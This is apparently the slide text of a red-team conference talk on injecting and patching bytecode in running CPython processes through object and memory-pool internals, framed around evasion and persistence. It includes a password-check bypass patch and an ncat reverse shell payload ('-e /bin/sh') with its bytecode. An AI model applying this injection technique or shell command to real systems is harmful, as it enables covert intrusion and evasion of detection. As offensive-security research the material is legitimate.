Evolving the Process Injection Injecting the Python bytecode - - PowerPoint PPT Presentation
Evolving the Process Injection Injecting the Python bytecode - - PowerPoint PPT Presentation
Evolving the Process Injection Injecting the Python bytecode WhoAmI Red teamer at Sberbank of Russia OSCP/OSCE/SLAE Process Injection purposes Accessing/modifying in-memory data or program execution flow AV evasion &
WhoAmI
- Red teamer at Sberbank of Russia
- OSCP/OSCE/SLAE
Process Injection purposes
- Accessing/modifying in-memory data or program execution flow
- AV evasion & anti-forensics
- Post-exploitation & maintaining access
Traditional Process Injection
- Linux
○ strace ○ ptrace ○ SO Injection
- Windows
○ DLL Injection ○ Process Hollowing
Software is Evolving
- Interpreted (and VM-based) languages keep growing their popularity, even in
non-traditional areas
- New paradigms - microservices, serverless technologies
Evolving & Attacker Benefits
- Injecting VM-based (or other interpreted) languages potentially gives us all
benefits of these languages in our payloads — portability, ability to use “high-level” interfaces over “low-level” functions and other
- Also, it is very hard to investigate — how many people can detect and
successfully reverse engineer Java or Python bytecode payloads?
Primary Goal
- Find a way to manipulate running Python process to gain required impact on
target system (usermode persistence, internal logic modification and other)
- This way should work at least for x86_64 CPU, Linux and CPython 3.5.3
Python
- Interpreted, high-level programming language
- Object-oriented, mostly
- Strong community, great standard library, and perfect extensibility
Note: Python itself is just a reference, you can build your own Python engine and decide how it will work with Python code — compile it to special bytecode, interpret it as is, or even translate to Java bytecode and execute it with JVM
CPython
- The reference implementation of Python
- Written in C (and Python)
- Compiles source code to bytecode and interprets it with Python Virtual
Machine (PVM)
CPython — Compilation
1. Parse source code into a parse tree 2. Transform parse tree into an Abstract Syntax Tree 3. Transform AST into a Control Flow Graph 4. Emit bytecode based on the Control Flow Graph
CPython — Compilation Example
>>> def hello(): ... print("Hello!") >>> hello <function hello at 0x10bd210d0> >>> hello() Hello! >>> hello.__code__.co_code.hex() '740064018301010064005300' >>> dis.dis(hello.__code__) 2 0 LOAD_GLOBAL 0 (print) 2 LOAD_CONST 1 ('Hello!') 4 CALL_FUNCTION 1 6 POP_TOP 8 LOAD_CONST 0 (None) 10 RETURN_VALUE
Compilation produces a set of Objects (e.g., CodeObject for handling bytecode) and prepares them for Interpretation in the PVM
CPython — Python Virtual Machine (PVM)
- Virtual Stack Machine
○ Value Stack, Call Stack, and Block Stack ○ No registers ⇨ Short instructions list
- Custom memory management
○ Huge space mapped as MAP_ANONYMOUS | MAP_PRIVATE ○ Arenas, Pools, and Blocks — internal memory management primitives ⇨ Small amount of system malloc/free calls
- Operates Objects, not raw memory values
⇨ Keeps abstraction level high
CPython — A Short Guide to Objects
- Compilation and Interpretation produce a wide set of memory primitives
named Objects
- C is not Object-Oriented, therefore all Objects are described with
corresponding structs
- PVM works with these structs, therefore, we have to discover some of them to
move forward
CPython — PyObject & PyVarObject
- Universal headers, the Basis for all other Objects
- Every pointer to a CPython Object can be cast to a PyObject* — inheritance
built by hand
- PyVarObject is just a PyObject extension to describe Objects with
variable-sized part
PyObject — Structure
typedef struct _object { _PyObject_HEAD_EXTRA Py_ssize_t ob_refcnt; struct _typeobject *ob_type; } PyObject;
PyVarObject — Structure
typedef struct { PyObject ob_base; Py_ssize_t ob_size; } PyVarObject;
CPython — Types
- Every Object in CPython has its own Type specified by PyObject.ob_type field
- Types are Objects too — instances of PyTypeObject struct
- Type Objects are a fundamental part of CPython describing Objects
functionality and behavior
- Some Examples:
○ PyUnicodeObject.ob_type → PyUnicode_Type ○ PyBytesObject.ob_type → PyBytes_Type ○ PyCodeObject.ob_type → PyCode_Type
CPython — The Type for Types
- Every Type Object is a PyObject, therefore it has the ob_type field:
○ PyUnicode_Type.ob_type → PyType_Type ○ PyBytes_Type.ob_type → PyType_Type ○ PyCode_Type.ob_type → PyType_Type
- But PyType_Type is a PyObject too:
○ PyType_Type.ob_type → PyType_Type
PyTypeObject — Structure
typedef struct _typeobject { PyObject_VAR_HEAD const char *tp_name; Py_ssize_t tp_basicsize, tp_itemsize; ... } PyTypeObject;
A Short Guide to Objects — Subtotals
- We already know the structure of PyObject and PyTypeObject instances —
comparatively, low-level structures.
- There is still no place to inject CPython bytecode.
- Let’s check the Object that works with CPython bytecode itself —
PyCodeObject.
CPython — PyCodeObject
- PyCodeObject — PyObject extension to describe pieces of Static Code.
- PyCodeObject.ob_type → PyCode_Type
- PyCodeObject is NOT a run-time primitive, it stores only static information
about bytecode:
○ PyUnicodeObject* co_name — specifies code name (e.g., function name, <stdin>) ○ PyBytesObject* co_code — opcode sequence ○ PyTupleObject* co_consts — constants used
PyCodeObject — Example
>>> def hello(): ... print("Hello!") ... >>> hello.__code__.co_name 'hello' >>> hello.__code__.co_code b't\x00d\x01\x83\x01\x01\x00d\x00S\x00' >>> hello.__code__.co_consts (None, 'Hello!')
PyCodeObject — Structure
typedef struct { PyObject_HEAD ... PyObject *co_code; PyObject *co_filename; PyObject *co_name; ... } PyCodeObject;
PyCodeObject — Points of Interest
- Controlling PyCodeObject allows us to play with member fields and pointers
like co_code and co_consts
- Changing the co_code (ob_type → PyBytes_Type) field gives us an ability to
change existing or inject new bytecode
- Playing with the co_consts (ob_type → PyTuple_Type) field allows us to add
some data to our injection
CPython — PyBytesObject
- PyBytesObject — PyVarObject extension to describe byte sequences
- PyBytesObject.ob_type → PyBytes_Type
- Just a container for bytes sequence
PyBytesObject — Structure
typedef struct { PyObject_VAR_HEAD Py_hash_t ob_shash; char ob_sval[1]; } PyBytesObject;
CPython — PyTupleObject
- PyTupleObject — PyVarObject extension to describe immutable arrays of
- bject references
- PyTupleObject.ob_type → PyTuple_Type
- Just a container for object references
PyTupleObject — Structure
typedef struct { PyObject_VAR_HEAD PyObject *ob_item[1]; } PyTupleObject;
A Short Guide to Objects — Conclusion
- Gaining control on PyCodeObject and corresponding low-level structures
allows us to patch bytecode, inject values and do other things in the Virtual Memory
- The main question there — How can we find necessary PyCodeObject?
Finding PyCodeObject
The main approach: unraveling pointers chains
- with known code name — targeted impact
○ Code name ⇨ PyUnicodeObject ⇨ PyCodeObject.co_name ○
- with Symbol Table lookup — requires access to Python binary
○ PyCode_Type (from Symbol Table) ⇨ PyCodeObject.ob_type ○
- with PyType_Type — potentially gives us access to all Objects
○ “type\x00” ⇨ PyType_Type ⇨ PyCode_Type ⇨ PyCodeObject.ob_type
PyCodeObject.co_code Patching
- When PyCodeObject is located, we can continue our work
- Let’s try to patch existing bytecode and see how can we use that
PyCodeObject.co_code Patching — Example
def check_password(password): if password == "P@ssw0rd": return True else: return False
- An old-school example — patching the “if-then-else” construction
# bytecode: 7c00006401006b0200721000640200536403005364000053
PyCodeObject.co_code Patching — Example
- Will use NOP instruction with 0x09 opcode
# bytecode[9:12] = b”\x09\x09\x09”
PyCodeObject.co_code Patching — The Problem
- There is a chance to crash the application while patching bytecode being
executed
- PyCodeObject is not a run-time primitive, there is no flag to show us the
Object is executing or not
- But this flag exists in PyFrameObject
CPython — PyFrameObject
- PyFrameObject — PyVarObject extension to describe the Call Stack Frame
- PyFrameObject.ob_type → PyFrame_Type
- PyFrameObject — dynamic object created during Interpretation, it stores
arguments during function call and do other things like traditional Stack Frame
PyFrameObject — Structure
typedef struct _frame { PyObject_VAR_HEAD struct _frame *f_back; /* previous frame, or NULL */ PyCodeObject *f_code; /* code segment */ ... PyObject *f_locals; /* local symbol table (any mapping) */ ... PyObject *f_localsplus[1]; /* locals+stack, dynamically sized */ } PyFrameObject;
The Problem — Solution
- Enum all PyFrameObjects with f_code field pointing to PyCodeObject we are
going to patch and check PyFrameObject.f_executing flag
- If no PyFrameObjects are executing, patch the bytecode
Demo #1
From Patching to Injection
- The simplest way to expand patching to injecting will not work — If we try to
append some opcodes to existing bytecode, we will crash the application
- Moreover, we still don’t know how to add some data to our payload
- The key to Injection is the ability to construct necessary objects and embed
them to CPython memory structure and program flow
CPython — Memory Blocks
- The “bytes” object is Immutable
CPython — Memory Model
- Custom memory manager build on the top of system allocator — PyMalloc
- PyMalloc operates a set of primitives — Blocks, Pools, and Arenas
- Reference Counting (PyObject.ob_refcnt) Garbage Collector
Controlling the Pool
- The Pool concept is the most interesting for us.
- Each Pool has the Pool Header that stores some juicy info — like free blocks
list, freed by Garbage Collector
- Pool Header address is a multiple of 4096, therefore it is easy to obtain Pool
Header address with a known address of the Object (and corresponding Block) that lies inside of this Pool
pool_header — Structure
struct pool_header { union { block *_padding; uint count; } ref; /* number of allocated blocks */ block *freeblock; /* pool's free list head */ struct pool_header *nextpool; /* next pool of this size class */ struct pool_header *prevpool; /* previous pool "" */ ... uint nextoffset; /* bytes to virgin block */ uint maxnextoffset; /* largest valid nextoffset */ };
pool_header — Structure
Injection — Memory Allocation Strategy
- We know PyCodeObject address — can obtain the address of the current
Pool Header
- If there are some blocks in the free blocks list, shorten the list and get some
blocks for injected data (better to take Blocks from the middle of the list)
- If no, check previous or next Pool Header
Injection — Payload
- Now we can create our own Objects and embed them to the CPython
Memory layout
- Let’s develop a simple nc-based reverse shell payload and inject it into
existing code
Payload — Balancing Code and Data
def shell_1(): import os
- s.system( 'ncat 127.0.0.1 8081 -e /bin/sh
&') def shell_2(): eval("__import__('os').system('ncat 127.0.0.1 8081 -e /bin/sh &')" ) 0 LOAD_CONST 1 (0) 2 LOAD_CONST 0 (None) 4 IMPORT_NAME 0 (os) 6 STORE_FAST 0 (os) 8 LOAD_FAST 0 (os) 10 LOAD_METHOD 1 (system) 12 LOAD_CONST 2 ('ncat 127.0.0.1 8081 ...') 14 CALL_METHOD 1 16 POP_TOP 18 LOAD_CONST 0 (None) 20 RETURN_VALUE 0 LOAD_GLOBAL 0 (eval) 2 LOAD_CONST 1 ("__import__('os') ...") 4 CALL_FUNCTION 1 6 POP_TOP 8 LOAD_CONST 0 (None) 10 RETURN_VALUE
Payload — Explanation
0 LOAD_GLOBAL 0 (eval) Pushes the 0th element from the co_names to the Stack >>> shell_2.__code__.co_names ('eval',) 2 LOAD_CONST 1 ("__import__('os') ...") Pushes the 1st element from the co_consts to the Stack >>> shell_2.__code__.co_consts (None, "__import__('os').system('ncat 127.0.0.1 8081 -e /bin/sh &')") 4 CALL_FUNCTION 1 6 POP_TOP Calls the Eval function and pops the result (really, who cares about the result?) 8 LOAD_CONST 0 (None) 10 RETURN_VALUE Loads the 0th element from the co_consts (None) and returns it as a result of our function — the most unnecessary part for our payload
Injection — Battle Plan
- Create the raw values for the following Objects
○ PyUnicodeObjects — for “eval” and “__import__('os').system('...')” strings ○ PyTupleObjects — for new PyCodeObject.co_names & co_consts tuples ○ PyBytesObject — for patched PyCodeObject.co_code bytecode containing injection itself
- Find suitable free blocks and inject these raw values into these blocks
- Provide the PyCodeObject with new addresses of co_names, co_consts and
co_code
- Plan is good, but it will crash the application without one simple detail
PyCodeObject.co_lnotab
- Stores the mapping from bytecode offsets to line numbers
- A set of pairs in hexadecimal format — (bytecode offset, according source
code lines count)
def hello(): print("hello!") print("world!") return True >>> dis.dis(hello) 2 0 LOAD_GLOBAL 0 (print) 2 LOAD_CONST 1 ('hello!') 4 CALL_FUNCTION 1 6 POP_TOP 3 8 LOAD_GLOBAL 0 (print) 10 LOAD_CONST 2 ('world!') 12 CALL_FUNCTION 1 14 POP_TOP 4 16 LOAD_CONST 3 (True) 18 RETURN_VALUE >>> hello.__code__.co_lnotab b'\x00\x01\x08\x01\x08\x01'
PyCodeObject.co_lnotab Poisoning
- Poisoning co_lnotab with value “\x00\x01” allows us to inject any payload
- We just need to create a PyBytesObject with this value and change the
PyCodeObject.co_lnotab pointer
- After that, we are ready to inject our payload
Demo #2
Conclusion
- Controlling PyCodeObject is the first step of the bytecode Patching or
Injection
- Common memory patching techniques (e.g., “if-then-else” statements
patching) works well for CPython